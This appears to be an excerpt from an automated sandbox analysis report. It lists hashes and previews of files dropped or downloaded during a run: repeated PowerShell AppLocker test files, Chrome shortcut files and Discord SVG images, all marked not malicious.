                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9849785728749576
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8yduTKG7HyidAKZdA19ehwiZUklqehey+3:83r8xy
                                                                                                                                                                                                                                                                                    MD5:32B10E7AFC9FB907167D65520E3CE247
                                                                                                                                                                                                                                                                                    SHA1:CA1A9EDB757273553CB02BA3244D867F87A0F0B7
                                                                                                                                                                                                                                                                                    SHA-256:105C8FB8E5053FE284B29236BB138F1F71B9D114CC9ACA458315CF3B0A79AE80
                                                                                                                                                                                                                                                                                    SHA-512:F8DF6E5E124589C2CF717CD9E94374C3A57898FCE9DCFD4DCE0830DC4E8D31A7F30548A77DDBB762F763298BDC50447B6FFB63C3E41761862460D209E1D267A2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....%:..=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9986399723416106
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:86duTKG7HyidAKZdA1weh/iZUkAQkqehhy+2:8frO9Qcy
                                                                                                                                                                                                                                                                                    MD5:CF71C56BBDFA0F7B9D3F5BC8AAD6C56F
                                                                                                                                                                                                                                                                                    SHA1:F618A8FB1070483F3EDE9CFEF29CBE334FE58B11
                                                                                                                                                                                                                                                                                    SHA-256:1342C824201B1CE40B2976AFB29CECA95C3F27779229025BAEAE33393599A6DF
                                                                                                                                                                                                                                                                                    SHA-512:BFE4EAB39EFD32EC92B2BC648B2DBE70530B7DF2BD20050CE0A15BE58CCF412DA9DBB42F0DADF49AD8A4ED8CF89143D4A2A13884FE00E66F4AB7A29165E45345
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,...... ..=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2693
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.010114978948887
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8xPduTKGsHyidAKZdA14tseh7sFiZUkmgqeh7sXy+BX:8x0rfnNy
                                                                                                                                                                                                                                                                                    MD5:B03E81E25CD9777890C000F1D76FE66A
                                                                                                                                                                                                                                                                                    SHA1:49D787C9991E40DE327F413D7CA435CBCAEF4731
                                                                                                                                                                                                                                                                                    SHA-256:C2ECE5B4E9ED578ED51E0155C54356C72CBDD65634DD36C652FFF4B8957FB580
                                                                                                                                                                                                                                                                                    SHA-512:6F212914DB7E4BDC60D5B641992E43BC1EB24419A1D74D1908FB2304606D75FBF4A1C7CAECA4DB1D6ADBE9B0572F88550C3DE02A907290D5F96BE444AFD44717
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.998263295708965
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8wduTKG7HyidAKZdA1vehDiZUkwqehly+R:8JrVPy
                                                                                                                                                                                                                                                                                    MD5:A0C59D5DD3D61A5DAF87DC9F79E1E5B6
                                                                                                                                                                                                                                                                                    SHA1:10B13B54931B0EB2711277C73BD3ED67599280B7
                                                                                                                                                                                                                                                                                    SHA-256:86DE78077DD22AE81253F08CDFB92B14EBDB58B09FEF72D542DC4A35EF7EE848
                                                                                                                                                                                                                                                                                    SHA-512:D730CFDC627E4BD7562771C88186370F6717265D2B7B38B1705369BA146F3118B8DA2DE21CB3DCC6FB9058BDCBF75BE99B300F7D1176D6920AEDA4ED198F6D81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....'....=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9884551875825736
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8GduTKG7HyidAKZdA1hehBiZUk1W1qehzy+C:8brF9Ty
                                                                                                                                                                                                                                                                                    MD5:35243710D3C23BFA40C71BD9B0291F65
                                                                                                                                                                                                                                                                                    SHA1:2E874E5D88F657D2EB767408309F21C6E8994FAE
                                                                                                                                                                                                                                                                                    SHA-256:81780482E92F72A41ACB15B695AFB7F3CB810D5D7766BE196CB17FE5802BD485
                                                                                                                                                                                                                                                                                    SHA-512:C4BCCC6B766A864F2A933BD50153BE7E19C4D01FF5417AB01B59B4B572B255859266F12ABAD957A9313BF0A500B7A0FB404AC222FA33F727FE422FC0DEAF1E02
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....%.,..=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 19:12:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2683
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9985732086313064
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8hYduTKG7HyidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbNy+yT+:8PrZT/TbxWOvTbNy7T
                                                                                                                                                                                                                                                                                    MD5:1BDD80F5CBFB1767E0687CDE0D3376FC
                                                                                                                                                                                                                                                                                    SHA1:E999E15522AFB1705FB942514E9AE1995D06706E
                                                                                                                                                                                                                                                                                    SHA-256:06B62D4C06C8F35C7D075C662AB7AD7168AF6339444EA40B3F5FE61499127E62
                                                                                                                                                                                                                                                                                    SHA-512:040D72DD7B0C653B9BF1EAF26E1A907D617F323EE6E3714F30FB66B42F9849E9C18010C13CFF5D7B0C892D697D00831BAABF1BF049B4A4F4F38EE43868A4D0DE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....X...=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............5.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):87973
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.125806607183933
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:f0kGwo/3g1MGEN6UCSQyYHhU58xxfrDX/5CF+gD58G3LpV9H5B7va:f0kGDZc
                                                                                                                                                                                                                                                                                    MD5:E05640582E20F17E0F1797160B67DCD4
                                                                                                                                                                                                                                                                                    SHA1:DCB27383F5836437E5433C7CCB5981E94826EE00
                                                                                                                                                                                                                                                                                    SHA-256:E9DEEBCC271633C282AB3FE440CE81A196ECE4F402804FE8940030F98C563475
                                                                                                                                                                                                                                                                                    SHA-512:60CDDA59E85FDED81B351614DAF3D40B30F939F7F8D9B586F516165699822E8F07F344CDD3709DCF6ADA350C725330DF26B6947322F154AB54D02C5AF3AAD71B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/b9995525a52dc58aecf5.svg
                                                                                                                                                                                                                                                                                    Preview:<svg width="1440" height="900" viewBox="0 0 1440 900" preserveAspectRatio="xMinYMin slice" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)"><path d="M1440 0H0v900h1440V0Z" fill="url(#c)"/><path d="M1440 0H435.551v620.81H1440V0Z" fill="url(#d)"/><path d="M1440 341.601H484.351v558.38H1440v-558.38Z" fill="url(#e)"/><path d="M1440 0H427.5v690.995H1440V0Z" fill="url(#f)"/><path d="M787.663 810.02c330.987-141.179 530.547-416.834 445.727-615.692C1148.57-4.53 811.492-51.288 480.502 89.891 149.512 231.07-50.048 506.725 34.772 705.583c84.821 198.858 421.901 245.616 752.891 104.437Z" fill="url(#g)"/><path d="M1024.18 825.565c290.6-123.952 456.96-386.723 371.57-586.916-85.39-200.193-390.19-261.999-680.792-138.047-290.602 123.952-456.959 386.724-371.569 586.917 85.389 200.193 390.19 261.998 680.791 138.046Z" fill="url(#h)"/><path d="M673.907 771.815c264.238-112.707 429.363-319.136 368.823-461.073-60.538-141.936-323.823-165.631-588.061-52.924C190.431 370.5
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):3146
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.484082045212369
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:C4LO/K7oWBkomgBkRzd0kJBJkI8JkINGD/dYk2kahkzd/FnLgkpmZ5ZOE83VCn:RO/IS53JBJbKbN4WQbMRZmEAI
                                                                                                                                                                                                                                                                                    MD5:81084FF5A27B6E6FF487E479C37D1660
                                                                                                                                                                                                                                                                                    SHA1:81A274F69A1358F85715A0FEA227730D795CB353
                                                                                                                                                                                                                                                                                    SHA-256:075DE1D6EA4FB470197A88BA371F60F70B819B250CB5AF8BD6A4794B1A9CA4A1
                                                                                                                                                                                                                                                                                    SHA-512:CCCD00A5C013B130BE0A8466F903F7EEE9306518DFAA8758849027EBC1829EA2A6B7516E4D2070B110A12EC7EB559E3B75D256AD1B07BE3FD8595C0E430DC0D5
                                                                                                                                                                                                                                                                                    Malicious:false
